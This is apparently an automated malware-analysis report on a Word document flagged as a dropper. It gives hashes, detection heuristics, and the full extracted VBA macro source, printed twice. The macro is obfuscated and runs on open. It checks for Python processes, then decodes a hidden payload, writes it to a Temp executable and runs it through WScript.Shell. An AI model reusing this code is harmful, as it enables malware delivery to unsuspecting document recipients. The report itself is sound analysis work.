Office (OLE) malware analysis — malicious · 6a2fa09ae98cb642

MALICIOUS

Office (OLE)

305.5 KB Created: 2016-06-22 14:39:00 First seen: 2016-08-10

MD5: 8bd7f4c7ca4c06032a481e527dba2a47 SHA-1: 0ba7958ba03cc8f844ec29fe2cb5183dc078c014 SHA-256: 6a2fa09ae98cb642f7dc3dabbfc107a9483d28aa8f6ea015ebcbb0892627706a

368 Risk Score

Heuristics 10

ClamAV: Doc.Dropper.Agent-6875133-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6875133-0
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
Set dicranales = CreateObject("WScript.Shell")
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set dicranales = CreateObject("WScript.Shell")
```
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
Set hornbeam = GetObject(exacerbate & ".\root\cimv2")
```
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
Matched line in script
```
cryptobiosis = CallByName(encompassment, lg, misguidance, dacoity)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Public Sub AutoOpen()
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12271 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12271 bytes
SHA-256: `9bc5bc63bdf1aa6a432730cd302484a71e59193c81465791a635b954ee2288ba`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub InsertSymbolMethod() Dim MyRange As Object Set MyRange = ActiveDocument.Range ' Selection Example: Selection.InsertSymbol CharacterNumber:=171, _ Font:="Symbol", Unicode:=False ' Range Example: MyRange.Collapse Direction:=wdCollapseStart MyRange.InsertSymbol CharacterNumber:=171, _ Font:="Symbol", Unicode:=False End Sub Public Sub AutoOpen() Dim homines As Integer Dim remilitarization As Integer Dim homoecious As Integer Dim saliferous As Integer homoecious = Sin(20) If homoecious < 118 + 82 + 17 - 573 Then InsertSymbolMethod Else Dim conepatus As Byte blare = inordinately.ScrollLeft argues = 1 - 43 - 110 + 161 Select Case argues Case 1 To 12 surname = quadrupedal caller = cercidiphyllaceae girlhood = Left("sofclawlike", 3) & Ucase("tbOIL") & Mid("architectonicedcurling", 14, 2) Case 13 blender = picariae biquadratic = ailing nominal = Mid("befooledblacromyotonia", 9, 2) + Lcase("Otch") + Right("feudallyy", 1) Case 15 heightening = laborem heavendirected = blastomere End Select End If End Sub Sub ToggleTextBoundaries() If Documents.Count > 0 Then With ActiveDocument.ActiveWindow.View .ShowTextBoundaries = Not .ShowTextBoundaries End With End If End Sub Attribute VB_Name = "cetraria" Dim insider Dim stereognostic Dim autoradiographic As Long Dim ulna Function Strip_Hyperlinks_Bookmarks_Fields() Dim myLink As Hyperlink Dim myBookmark As Bookmark Dim myField As Field With ActiveDocument For Each myLink In .Hyperlinks myLink.Delete Next myLink For Each myBookmark In .Bookmarks myBookmark.Delete Next myBookmark For Each myField In .Fields myField.Unlink Next myField End With End Function Function bonsai(blockage) Dim mystically As Variant Dim avo As Integer Dim poem As Variant butterfish = StrConv(blockage, 128) complex = gaucherie attaghan = Mid("asportationabredhead", 12, 2) & "watt" bonsai = butterfish End Function Sub mignonette(lineman, dacoity) Dim cropdusting As Integer Set encompassment = lineman misguidance = 17 - 16 If Sin(misguidance) <> 51 Then lg = Mid("armholerupeopled", 8, 2) + Mid("chickadeendragonnade", 10, 1) Else lg = "telegonous" End If cryptobiosis = CallByName(encompassment, lg, misguidance, dacoity) End Sub Sub bassariscidae(unheaded, chevronne) Open unheaded For Binary Access Read Write As #chevronne End Sub Sub alignment() insider = "exodontics" homemaker = "alephnull" Dim penetrate As String autoradiographic = autoradiographic Mod 403 If Sin(18) <> 63 Then Dim flirt As String penetrate = ablepharia Dim inebriates As Byte Else herbist = bedizened End If mohair = 58 Select Case mohair Case 36 To 40 Dim agleam As Byte stereognostic = stereognostic \ 78 iapetus = ctenidium Case 22 To 30 Dim whitmonday As Variant stereognostic = stereognostic + 114 frailty = Lcase("ta") & Lcase("PEst") & Mid("complexlyrypleasurableness", 10, 2) Case 58 To 58 flirt = penetrate + "\" + Lcase("ci") & Lcase("cEr.") & Mid("autarkyexecontre", 8, 3) cyst = plumbaginales retractile = FreeFile End Select autoradiographic = autoradiographic + 158 cariamidae = 120 - 120 stereognostic = stereognostic And 302 sixpenny = cariamidae bassariscidae flirt, retractile exosphere = inordinately.whipper hug = 62 Select Case hug Case 37 To 44 Dim controlled As Integer insider = "mansized" amaryllidaceae = uppercut Case 37 To 39 Dim aft As Long ulna = "perkily" mam = businessman Case 62 To 62 insider = "brazenly" cheering = exosphere End Select biface = 94 - 124 - 48 + 144 Select Case biface Case 9 To 14 Dim beadle As Long ulna = "remaining" astraphobia = Ucase("UNd") + Ucase("ERWOO") + Lcase("D") Case 3 To 9 Dim exaction As Variant ulna = Right("alignmentcho", 3) + "rography" pileous = fagend Case 66 To 66 ulna = Right("sulkmi", 2) & "stfl" & Ucase("oWeR") bujumbura = curriculum(cheering) carvelbuilt = Len(bujumbura) Dim xi As Long End Select stereognostic = stereognostic Xor 299 insider = "ac" + Ucase("iDiFy") autoradiographic = autoradiographic Mod 160 aspidistra = 41 + 16 Select Case aspidistra Case 38 To 43 Dim armillary As Byte stereognostic = stereognostic \ 196 labridae = Left("discbeanfeast", 4) & Mid("agronomistountenacondenser", 11, 7) & StrReverse("ecn") Case 2 To 6 Dim shikoku As Variant ulna = "fishy" blatantly = Lcase("zE") & Right("deafeningstful", 5) Case 29 To 30 Dim superficiality As Integer stereognostic = stereognostic + 377 last = StrReverse("ah") & StrReverse("eruhc") Case 57 To 57 cetraria.uninspiring bujumbura, sixpenny, retractile insider = "effectively" End Select narrow = 122 + 90 - 9 - 137 Select Case narrow Case 40 To 48 Dim hispaniola As String autoradiographic = autoradiographic / 240 materialize = backwardness Case 12 To 13 Dim hammerlock As Long stereognostic = stereognostic * 3 premiership = desecrating Case 66 To 66 stereognostic = stereognostic \ 402 Close #retractile insider = "basifixed" Set dicranales = CreateObject("WScript.Shell") End Select autoradiographic = autoradiographic * 4 mignonette dicranales, flirt End Sub Sub HeaderFooterProperty() Dim MyText As String MyText = "<Replace this with your text>" ActiveWindow.ActivePane.View.SeekView = wdSeekCurrentPageHeader Selection.HeaderFooter.Range.Text = "MyText" ActiveWindow.ActivePane.View.SeekView = wdSeekMainDocument End Sub Function ablepharia() Dim capsicum As Variant Dim gory As Variant mans = Left("Scdriftage", 2) + Lcase("riPt") + "ing." expeditious = 58 + 57 - 4 - 45 Select Case expeditious Case 20 To 25 Dim loment As Byte stereognostic = stereognostic \ 273 meniscus = Ucase("af") + Left("frontapollo", 5) Case 38 To 39 Dim approved As Integer insider = "selaginellaceae" polycirrus = asmodeus Case 33 To 39 Dim agnition As Byte ulna = "breve" rhinotermitidae = Right("aljibarco", 2) + Mid("noddymmonalityfellowfeeling", 6, 9) Case 66 To 66 syntagma = Mid("sometimesFileend", 10, 4) + Right("regaleSystemOb", 8) + Mid("magnajectpenates", 6, 4) disenchanting = mans + syntagma End Select sodden = 17 + 84 + 96 - 136 Select Case sodden Case 30 To 31 Dim misconjecture As Byte insider = Lcase("Gl") & Left("omereagleeyed", 4) & StrReverse("sulu") inadmissible = Right("centauryat", 2) & Mid("admittabletempermugil", 11, 6) Case 21 To 22 Dim african As Integer insider = "es" & Mid("thromboplastinophaceratopetalum", 15, 4) & Right("maldugeal", 4) farcical = Mid("airstreamchyesterday", 10, 2) & Ucase("IPPeN") & Lcase("dAle") Case 20 To 23 Dim impropriation As Integer insider = Right("magazineen", 2) & Ucase("ErGi") & Lcase("d") skullcap = "st" + StrReverse("sily") + Mid("aeroscopetpenocha", 10, 1) Case 61 To 61 Dim bustup As String Set hf = VBA.CreateObject(disenchanting) khepera = 61 + 107 - 167 etch = Mid("accuseGetunrelieved", 7, 3) & Left("Speciahornet", 6) & "lFolder" End Select ablepharia = CallByName(hf, etch, khepera, 70 + 116 - 77 - 107) End Function Function curriculum(lancelot) As String Dim untunable(63) As Long Dim parsimonia As String Dim assumiing(63) As Long autoradiographic = autoradiographic \ 209 Dim chrysophrys As Long Dim changed(255) As Byte Dim oryzomys() As Byte Dim ecstatic(63) As Long Dim murrey As Long Dim lymphoma As Long Dim laical As Integer ulna = "penology" Dim aspirant As Long Dim anadiplosis() As Byte clamatores = 255 rightabout = 54 + 117 + 3861 cfallacy = 63 foots = 64 associable = 65280 macron = 16515072 fucker = 262144 doublecrosser = 258048 monkey = 16711680 dissimilarity = 56 + 200 pantry = 4096 caranday = 55 - 87 + 65568 Dim deuce As Variant Dim diode() As Byte diode = StrConv(lancelot, vbFromUnicode) Dim epicedium As Integer For arrrange = 0 To UBound(diode) diode(arrrange) = diode(arrrange) Xor 16 Next arrrange carposporous = 76 diceros = 65 If carposporous + diceros < 38 Then carposporous = Lcase("uMB") + "rageo" + Lcase("US") racial = Lcase("sA") & Right("buonppy", 3) Else diceros = 53 End If burmanniaceae = StrConv(diode, vbUnicode) laical = 1 outcome = 52 - 116 - 98 + 284 For lymphoma = 0 To 255 Select Case lymphoma Case 65 To 90 changed(lymphoma) = lymphoma - 65 Case 97 To outcome changed(lymphoma) = lymphoma - 71 Case 48 To 57 changed(lymphoma) = lymphoma + 4 Case 43 changed(lymphoma) = 62 Case 47 changed(lymphoma) = 63 End Select Next lymphoma For lymphoma = 0 To 63 assumiing(lymphoma) = lymphoma * foots ecstatic(lymphoma) = lymphoma * pantry untunable(lymphoma) = lymphoma * fucker Next lymphoma anadiplosis = StrConv(burmanniaceae, vbFromUnicode) avionics = 128 - 124 ReDim oryzomys((((UBound(anadiplosis) + 1) \ avionics) * 3) - 1) For aspirant = 0 To UBound(anadiplosis) Step 4 chrysophrys = untunable(changed(anadiplosis(aspirant))) + ecstatic(changed(anadiplosis(aspirant + 1))) + _ assumiing(changed(anadiplosis(aspirant + 2))) + changed(anadiplosis(aspirant + 3)) lymphoma = chrysophrys And monkey oryzomys(murrey) = lymphoma \ caranday lymphoma = chrysophrys And associable oryzomys(murrey + 1) = lymphoma \ dissimilarity oryzomys(murrey + 2) = chrysophrys And clamatores murrey = murrey + 3 Next aspirant parsimonia = StrConv(oryzomys, vbUnicode) If laical Then parsimonia = Left$(parsimonia, Len(parsimonia) - laical) curriculum = parsimonia End Function Sub uninspiring(ByRef abibis, roughhewn, epidendron) Dim bibos As Long Dim atelectasis() As Byte Dim stundism As String atelectasis = bonsai(abibis) occasioner = Mid("uninspiringmusobeginner", 12, 4) & Right("batrachoididaephagidae", 8) honeytongued = epidendron Put #honeytongued, , atelectasis End Sub Function austria() On Error GoTo northeasterly Dim aeequa As Long necessitas = Right("ferociousSel", 3) + Left("ect *chin", 5) + Left(" from pessimal", 6) Dim aphrophora As String stereognostic = stereognostic / 115 chronologically = "Win" + "32_Pro" + Left("duct alienated", 5) barley = 2 + 69 - 101 + 38 Select Case barley Case 1 To 9 analytical = afterimage expectant = wellbound Case 10 walleye = Right("epitomizeca", 2) + StrReverse("ocar") + Lcase("liTo") attribution = Ucase("SH") & Left("ortcmisgovernment", 4) & "oming" overreckon = anomaly Case 12 bulldog = butter goahead = Left("ampcornshucking", 3) + Ucase("HIBra") + StrReverse("hc") dicksoniaceae = efformation End Select Dim fretta As Variant courtship = Ucase("whERe") & Right("dachau Name LIKE", 10) & Left(" 'Python %'live", 11) autoradiographic = autoradiographic / 416 autoradiographic = autoradiographic - 153 exacerbate = Right("symphysiswin", 3) & Ucase("mGmtS") & Mid("globular:\\metaplasm", 9, 3) ulna = "adenitis" Set hornbeam = GetObject(exacerbate & ".\root\cimv2") advertising = 37 + 21 - 51 Select Case advertising Case 1 To 6 sheets = beati extravasate = fitting heliopsis = semidesert Case 7 brooklyn = funded iridic = Ucase("GU") & Mid("trawlerriackee", 6, 4) & Mid("clarichordllaillbred", 11, 3) Case 11 patriarchs = catamaran investiture = Lcase("ac") & Right("adelgeshene", 4) End Select Set fences = hornbeam.ExecQuery(necessitas + chronologically & courtship) If fences.Count > 0 Then austria = 10 End If northeasterly: End Function Attribute VB_Name = "inordinately" Attribute VB_Base = "0{E685E390-8973-4599-A25B-A669844A5CAD}{07F2D21F-2264-43D4-B463-63DE20809D97}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub UserForm_Initialize() If austria <> 10 Then cetraria.alignment End If End Sub

SHA-256: 9bc5bc63bdf1aa6a432730cd302484a71e59193c81465791a635b954ee2288ba

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub InsertSymbolMethod()
   Dim MyRange As Object
   Set MyRange = ActiveDocument.Range
   ' Selection Example:
   Selection.InsertSymbol CharacterNumber:=171, _
      Font:="Symbol", Unicode:=False
   ' Range Example:
   MyRange.Collapse Direction:=wdCollapseStart
   MyRange.InsertSymbol CharacterNumber:=171, _
      Font:="Symbol", Unicode:=False
End Sub

Public Sub AutoOpen()
Dim homines As Integer
Dim remilitarization As Integer
Dim homoecious As Integer
Dim saliferous As Integer
homoecious = Sin(20)
If homoecious < 118 + 82 + 17 - 573 Then
InsertSymbolMethod
Else
Dim conepatus As Byte
blare = inordinately.ScrollLeft
argues = 1 - 43 - 110 + 161
Select Case argues
Case 1 To 12
surname = quadrupedal
caller = cercidiphyllaceae
girlhood = Left("sofclawlike", 3) & Ucase("tbOIL") & Mid("architectonicedcurling", 14, 2)
Case 13
blender = picariae
biquadratic = ailing
nominal = Mid("befooledblacromyotonia", 9, 2) + Lcase("Otch") + Right("feudallyy", 1)
Case 15
heightening = laborem
heavendirected = blastomere
End Select

End If
End Sub

Sub ToggleTextBoundaries()
    If Documents.Count > 0 Then
        With ActiveDocument.ActiveWindow.View
            .ShowTextBoundaries = Not .ShowTextBoundaries
        End With
    End If
End Sub



Attribute VB_Name = "cetraria"
Dim insider
Dim stereognostic
Dim autoradiographic As Long
Dim ulna
  Function Strip_Hyperlinks_Bookmarks_Fields()
      Dim myLink As Hyperlink
      Dim myBookmark As Bookmark
      Dim myField As Field
      With ActiveDocument
          For Each myLink In .Hyperlinks
              myLink.Delete
          Next myLink
          For Each myBookmark In .Bookmarks
              myBookmark.Delete
          Next myBookmark
          For Each myField In .Fields
              myField.Unlink
          Next myField
      End With
  End Function


Function bonsai(blockage)
Dim mystically As Variant
Dim avo As Integer
Dim poem As Variant
butterfish = StrConv(blockage, 128)
complex = gaucherie
attaghan = Mid("asportationabredhead", 12, 2) & "watt"
bonsai = butterfish
End Function
Sub mignonette(lineman, dacoity)
Dim cropdusting As Integer
Set encompassment = lineman
misguidance = 17 - 16
If Sin(misguidance) <> 51 Then
lg = Mid("armholerupeopled", 8, 2) + Mid("chickadeendragonnade", 10, 1)
Else
lg = "telegonous"
End If
cryptobiosis = CallByName(encompassment, lg, misguidance, dacoity)
End Sub
Sub bassariscidae(unheaded, chevronne)
Open unheaded For Binary Access Read Write As #chevronne
End Sub

Sub alignment()
insider = "exodontics"
homemaker = "alephnull"
Dim penetrate As String
autoradiographic = autoradiographic Mod 403
If Sin(18) <> 63 Then
Dim flirt As String
penetrate = ablepharia
Dim inebriates As Byte
Else
herbist = bedizened
End If
mohair = 58
Select Case mohair
Case 36 To 40
Dim agleam As Byte

stereognostic = stereognostic \ 78
iapetus = ctenidium
Case 22 To 30
Dim whitmonday As Variant

stereognostic = stereognostic + 114
frailty = Lcase("ta") & Lcase("PEst") & Mid("complexlyrypleasurableness", 10, 2)
Case 58 To 58
flirt = penetrate + "\" + Lcase("ci") & Lcase("cEr.") & Mid("autarkyexecontre", 8, 3)
cyst = plumbaginales
retractile = FreeFile

End Select
autoradiographic = autoradiographic + 158
cariamidae = 120 - 120
stereognostic = stereognostic And 302
sixpenny = cariamidae

bassariscidae flirt, retractile
exosphere = inordinately.whipper
hug = 62
Select Case hug
Case 37 To 44
Dim controlled As Integer

insider = "mansized"
amaryllidaceae = uppercut
Case 37 To 39
Dim aft As Long

ulna = "perkily"
mam = businessman
Case 62 To 62
insider = "brazenly"
cheering = exosphere

End Select
biface = 94 - 124 - 48 + 144
Select Case biface
Case 9 To 14
Dim beadle As Long

ulna = "remaining"
astraphobia = Ucase("UNd") + Ucase("ERWOO") + Lcase("D")
Case 3 To 9
Dim exaction As Variant

ulna = Right("alignmentcho", 3) + "rography"
pileous = fagend
Case 66 To 66
ulna = Right("sulkmi", 2) & "stfl" & Ucase("oWeR")
bujumbura = curriculum(cheering)
carvelbuilt = Len(bujumbura)
Dim xi As Long

End Select
stereognostic = stereognostic Xor 299
insider = "ac" + Ucase("iDiFy")
autoradiographic = autoradiographic Mod 160
aspidistra = 41 + 16
Select Case aspidistra
Case 38 To 43
Dim armillary As Byte

stereognostic = stereognostic \ 196
labridae = Left("discbeanfeast", 4) & Mid("agronomistountenacondenser", 11, 7) & StrReverse("ecn")
Case 2 To 6
Dim shikoku As Variant

ulna = "fishy"
blatantly = Lcase("zE") & Right("deafeningstful", 5)
Case 29 To 30
Dim superficiality As Integer

stereognostic = stereognostic + 377
last = StrReverse("ah") & StrReverse("eruhc")
Case 57 To 57
cetraria.uninspiring bujumbura, sixpenny, retractile
insider = "effectively"

End Select
narrow = 122 + 90 - 9 - 137
Select Case narrow
Case 40 To 48
Dim hispaniola As String

autoradiographic = autoradiographic / 240
materialize = backwardness
Case 12 To 13
Dim hammerlock As Long

stereognostic = stereognostic * 3
premiership = desecrating
Case 66 To 66
stereognostic = stereognostic \ 402
Close #retractile
insider = "basifixed"
Set dicranales = CreateObject("WScript.Shell")

End Select
autoradiographic = autoradiographic * 4
mignonette dicranales, flirt
End Sub
Sub HeaderFooterProperty()
   Dim MyText As String
   MyText = "<Replace this with your text>"
   ActiveWindow.ActivePane.View.SeekView = wdSeekCurrentPageHeader
   Selection.HeaderFooter.Range.Text = "MyText"
   ActiveWindow.ActivePane.View.SeekView = wdSeekMainDocument
End Sub


Function ablepharia()
Dim capsicum As Variant
Dim gory As Variant
mans = Left("Scdriftage", 2) + Lcase("riPt") + "ing."
expeditious = 58 + 57 - 4 - 45
Select Case expeditious
Case 20 To 25
Dim loment As Byte

stereognostic = stereognostic \ 273
meniscus = Ucase("af") + Left("frontapollo", 5)
Case 38 To 39
Dim approved As Integer

insider = "selaginellaceae"
polycirrus = asmodeus
Case 33 To 39
Dim agnition As Byte

ulna = "breve"
rhinotermitidae = Right("aljibarco", 2) + Mid("noddymmonalityfellowfeeling", 6, 9)
Case 66 To 66
syntagma = Mid("sometimesFileend", 10, 4) + Right("regaleSystemOb", 8) + Mid("magnajectpenates", 6, 4)
disenchanting = mans + syntagma

End Select
sodden = 17 + 84 + 96 - 136
Select Case sodden
Case 30 To 31
Dim misconjecture As Byte

insider = Lcase("Gl") & Left("omereagleeyed", 4) & StrReverse("sulu")
inadmissible = Right("centauryat", 2) & Mid("admittabletempermugil", 11, 6)
Case 21 To 22
Dim african As Integer

insider = "es" & Mid("thromboplastinophaceratopetalum", 15, 4) & Right("maldugeal", 4)
farcical = Mid("airstreamchyesterday", 10, 2) & Ucase("IPPeN") & Lcase("dAle")
Case 20 To 23
Dim impropriation As Integer

insider = Right("magazineen", 2) & Ucase("ErGi") & Lcase("d")
skullcap = "st" + StrReverse("sily") + Mid("aeroscopetpenocha", 10, 1)
Case 61 To 61
Dim bustup As String
Set hf = VBA.CreateObject(disenchanting)
khepera = 61 + 107 - 167
etch = Mid("accuseGetunrelieved", 7, 3) & Left("Speciahornet", 6) & "lFolder"

End Select
ablepharia = CallByName(hf, etch, khepera, 70 + 116 - 77 - 107)
End Function

Function curriculum(lancelot) As String
Dim untunable(63) As Long
Dim parsimonia As String
Dim assumiing(63) As Long
autoradiographic = autoradiographic \ 209

Dim chrysophrys As Long
Dim changed(255) As Byte
Dim oryzomys() As Byte
Dim ecstatic(63) As Long
Dim murrey As Long
Dim lymphoma As Long
Dim laical As Integer
ulna = "penology"

Dim aspirant As Long
Dim anadiplosis() As Byte
clamatores = 255
rightabout = 54 + 117 + 3861
cfallacy = 63
foots = 64
associable = 65280
macron = 16515072
fucker = 262144
doublecrosser = 258048
monkey = 16711680
dissimilarity = 56 + 200
pantry = 4096
caranday = 55 - 87 + 65568
Dim deuce As Variant
Dim diode() As Byte
diode = StrConv(lancelot, vbFromUnicode)
Dim epicedium As Integer
For arrrange = 0 To UBound(diode)
diode(arrrange) = diode(arrrange) Xor 16
Next arrrange
carposporous = 76
diceros = 65
If carposporous + diceros < 38 Then
carposporous = Lcase("uMB") + "rageo" + Lcase("US")
racial = Lcase("sA") & Right("buonppy", 3)
Else
diceros = 53
End If

burmanniaceae = StrConv(diode, vbUnicode)
laical = 1
outcome = 52 - 116 - 98 + 284
For lymphoma = 0 To 255
Select Case lymphoma
Case 65 To 90
changed(lymphoma) = lymphoma - 65
Case 97 To outcome
changed(lymphoma) = lymphoma - 71
Case 48 To 57
changed(lymphoma) = lymphoma + 4
Case 43
changed(lymphoma) = 62
Case 47
changed(lymphoma) = 63
End Select
Next lymphoma
For lymphoma = 0 To 63
assumiing(lymphoma) = lymphoma * foots
ecstatic(lymphoma) = lymphoma * pantry
untunable(lymphoma) = lymphoma * fucker
Next lymphoma
anadiplosis = StrConv(burmanniaceae, vbFromUnicode)
avionics = 128 - 124
ReDim oryzomys((((UBound(anadiplosis) + 1) \ avionics) * 3) - 1)
For aspirant = 0 To UBound(anadiplosis) Step 4
chrysophrys = untunable(changed(anadiplosis(aspirant))) + ecstatic(changed(anadiplosis(aspirant + 1))) + _
assumiing(changed(anadiplosis(aspirant + 2))) + changed(anadiplosis(aspirant + 3))
lymphoma = chrysophrys And monkey
oryzomys(murrey) = lymphoma \ caranday
lymphoma = chrysophrys And associable
oryzomys(murrey + 1) = lymphoma \ dissimilarity
oryzomys(murrey + 2) = chrysophrys And clamatores
murrey = murrey + 3
Next aspirant
parsimonia = StrConv(oryzomys, vbUnicode)
If laical Then parsimonia = Left$(parsimonia, Len(parsimonia) - laical)
curriculum = parsimonia
End Function


Sub uninspiring(ByRef abibis, roughhewn, epidendron)
Dim bibos As Long
Dim atelectasis() As Byte
Dim stundism As String
atelectasis = bonsai(abibis)
occasioner = Mid("uninspiringmusobeginner", 12, 4) & Right("batrachoididaephagidae", 8)
honeytongued = epidendron
Put #honeytongued, , atelectasis
End Sub
Function austria()
On Error GoTo northeasterly
Dim aeequa As Long
necessitas = Right("ferociousSel", 3) + Left("ect *chin", 5) + Left(" from pessimal", 6)
Dim aphrophora As String
stereognostic = stereognostic / 115

chronologically = "Win" + "32_Pro" + Left("duct alienated", 5)
barley = 2 + 69 - 101 + 38
Select Case barley
Case 1 To 9
analytical = afterimage
expectant = wellbound
Case 10
walleye = Right("epitomizeca", 2) + StrReverse("ocar") + Lcase("liTo")
attribution = Ucase("SH") & Left("ortcmisgovernment", 4) & "oming"
overreckon = anomaly
Case 12
bulldog = butter
goahead = Left("ampcornshucking", 3) + Ucase("HIBra") + StrReverse("hc")
dicksoniaceae = efformation
End Select
Dim fretta As Variant
courtship = Ucase("whERe") & Right("dachau Name LIKE", 10) & Left(" 'Python %'live", 11)
autoradiographic = autoradiographic / 416

autoradiographic = autoradiographic - 153

exacerbate = Right("symphysiswin", 3) & Ucase("mGmtS") & Mid("globular:\\metaplasm", 9, 3)
ulna = "adenitis"

Set hornbeam = GetObject(exacerbate & ".\root\cimv2")
advertising = 37 + 21 - 51
Select Case advertising
Case 1 To 6
sheets = beati
extravasate = fitting
heliopsis = semidesert
Case 7
brooklyn = funded
iridic = Ucase("GU") & Mid("trawlerriackee", 6, 4) & Mid("clarichordllaillbred", 11, 3)
Case 11
patriarchs = catamaran
investiture = Lcase("ac") & Right("adelgeshene", 4)
End Select
Set fences = hornbeam.ExecQuery(necessitas + chronologically & courtship)
If fences.Count > 0 Then
austria = 10
End If
northeasterly:
End Function


Attribute VB_Name = "inordinately"
Attribute VB_Base = "0{E685E390-8973-4599-A25B-A669844A5CAD}{07F2D21F-2264-43D4-B463-63DE20809D97}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub UserForm_Initialize()
If austria <> 10 Then
cetraria.alignment
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.